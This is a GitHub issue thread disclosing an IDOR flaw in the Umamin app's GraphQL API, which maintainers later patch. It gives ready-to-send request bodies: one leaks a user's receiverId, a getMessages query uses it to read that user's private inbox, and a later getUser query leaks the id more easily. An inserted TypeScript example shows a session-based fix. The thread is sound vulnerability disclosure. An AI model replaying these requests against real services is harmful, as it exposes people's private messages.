
I can read anyone's private Umamin inbox with a little tinkering to the original GraphQL request #59

Closed
jmrcsnchz opened this issue Jul 28, 2022 · 4 comments
Labels
bug Something isn't working

Comments

@jmrcsnchz

Describe the bug
This vulnerability/bug is also known as an Insecure Direct Object Reference (IDOR) bug. This bug allows unauthorized users to view anyone's Private Messages by obtaining the target user's receiverId/userId.

To Reproduce
Steps to reproduce the behavior:

  1. The endpoint /api/graphql is the one vulnerable to this attack.
  2. My POST request data is as follows:
     {"query":"mutation sendMessage($input: SendMessageInput!) {\n  sendMessage(input: $input) {\n     id\n    receiverId\n    content\n  }\n}\n","variables":{"input":{"receiverUsername":"TARGET_USERNAME","content":"CONTENT_HERE","receiverMsg":"Send me an anonymous message!"}},"operationName":"sendMessage"}
  3. (Explanation of the request above) I just added the receiverId variable to the original GraphQL request.
  4. The endpoint will unexpectedly respond with the private receiverId value like below:
     {"data":{"sendMessage":{"id":"yyyyy-yyy-yyyy-yyyy-yyyyyy","receiverId":"xxxxxx-xxx-xxxx-xxxx-xxxxxx","content":"CONTENT_HERE"}}}
  5. Now, send another POST request to the same endpoint /api/graphql:
     {"query":"query getMessages($userId: ID!) {\n  messages(userId: $userId) {\n    id\n    content\n    isOpened\n    receiverMsg\n  }\n}\n","variables":{"userId":"THE_RECEIVERID_YOU_OBTAINED_EARLIER"},"operationName":"getMessages"}
  6. The endpoint will respond with the private messages corresponding to the userId you obtained:
     {"data":{"messages":[{"id":"yyyyy-yyy-yyyy-yyyy-yyyyyy","content":"vvvvvvvvvv","isOpened":false,"receiverMsg":"Send me an anonymous message!"},{"id":"yyyyy-yyy-yyyy-yyyy-yyyyyy","content":"vvvvvvvvvv","isOpened":true,"receiverMsg":"Send me an anonymous message!"}]}}

Expected behavior
This endpoint should return an error and not allow anyone to just grab others' private userId AND/OR the endpoint should not allow the use of any valid userId by non-authorized users.

@jmrcsnchz jmrcsnchz added the bug Something isn't working label Jul 28, 2022
@princejoogie
Member

@joshxfi you can use the current session to verify the request
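The fix princejoogie suggests above (verify the request against the current session) is what closes the IDOR in the report's step 5: the `messages` resolver must not trust a client-supplied userId as proof of ownership. The TypeScript below is an added example written for this thread; it is not Umamin's code and not the content of the patch commits. It puts the vulnerable resolver beside a hardened one that derives the inbox owner from the server-side session, and adds a response view for `sendMessage` that omits `receiverId` (the value leaked in step 4). The `Message`, `Session` and `Context` shapes, the in-memory store and all function names are assumptions.

```typescript
// Added example, not Umamin's code. Resolver-level ownership check for a
// GraphQL "messages(userId)" query. Types, store and names are assumptions.

interface Message {
  id: string;
  receiverId: string;     // internal owner id; must never act as an auth token
  content: string;
  isOpened: boolean;
  receiverMsg: string;
}
interface Session { userId: string }          // set server-side from the auth cookie
interface Context { session: Session | null } // what the resolver receives per request

// Constructed sample data: two users, each with their own private inbox.
const MESSAGES: Message[] = [
  { id: "m1", receiverId: "user-alice", content: "hello alice", isOpened: false, receiverMsg: "Send me an anonymous message!" },
  { id: "m2", receiverId: "user-alice", content: "second one",  isOpened: true,  receiverMsg: "Send me an anonymous message!" },
  { id: "m3", receiverId: "user-bob",   content: "hello bob",   isOpened: false, receiverMsg: "Send me an anonymous message!" },
];

// VULNERABLE (the behaviour in the report): the resolver filters purely on the
// userId argument, so anyone who learns a userId can read that user's inbox.
function messagesVulnerable(args: { userId: string }, _ctx: Context): Message[] {
  return MESSAGES.filter(m => m.receiverId === args.userId);
}

// HARDENED: the inbox owner is whoever the session identifies. The userId
// argument is still accepted for schema compatibility, but it is only allowed
// to name the caller's own account; anything else is rejected before any
// database access happens.
function messagesHardened(args: { userId: string }, ctx: Context): Message[] {
  if (!ctx.session) {
    throw new Error("Not authenticated");
  }
  const owner = ctx.session.userId;
  if (args.userId !== owner) {
    throw new Error("Forbidden");
  }
  // Query by the session-derived owner, never by the raw argument.
  return MESSAGES.filter(m => m.receiverId === owner);
}

// Public view of a freshly sent message: the sender only needs the message id
// and content back, so receiverId is dropped from the payload. This removes the
// step-4 leak, but it is defence in depth only; the authorization check above
// is what actually fixes the bug, because ids leak through other paths too
// (the getUser query later in this thread is one).
function toPublicSentMessage(m: Message): { id: string; content: string } {
  return { id: m.id, content: m.content };
}

// Minimal driver so the file runs stand-alone.
function demo(): string[] {
  const lines: string[] = [];
  const anon: Context = { session: null };
  const bob: Context = { session: { userId: "user-bob" } };

  lines.push(`vulnerable, anonymous caller: ${messagesVulnerable({ userId: "user-alice" }, anon).length} messages leaked`);
  for (const ctx of [anon, bob]) {
    try {
      messagesHardened({ userId: "user-alice" }, ctx);
      lines.push("hardened: unexpectedly allowed");
    } catch (e) {
      lines.push(`hardened: rejected (${(e as Error).message})`);
    }
  }
  lines.push(`hardened, bob reads own inbox: ${messagesHardened({ userId: "user-bob" }, bob).length} message(s)`);
  lines.push(`sendMessage public view keys: ${Object.keys(toPublicSentMessage(MESSAGES[0])).join(",")}`);
  return lines;
}

console.log(demo().join("\n"));
```

In a real resolver the session would come from the request context (cookie or bearer token validated server-side), and the simplest variant drops the `userId` argument from the schema entirely so there is nothing for a client to substitute.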

@jmrcsnchz
Author

Found an easier method using the getUser operation

{"query":"query getUser($username: String!) {\n  user(username: $username) {\n     id\n    message\n  }\n}\n","variables":{"username":"josh"},"operationName":"getUser"}

response

@joshxfi
Member

joshxfi commented Jul 29, 2022

@jmrcsnchz Thanks a lot for reporting this! I'll look into it

@joshxfi
Member

joshxfi commented Jul 29, 2022

patched: 8cfa2bc 22cf762

@joshxfi joshxfi closed this as completed Jul 29, 2022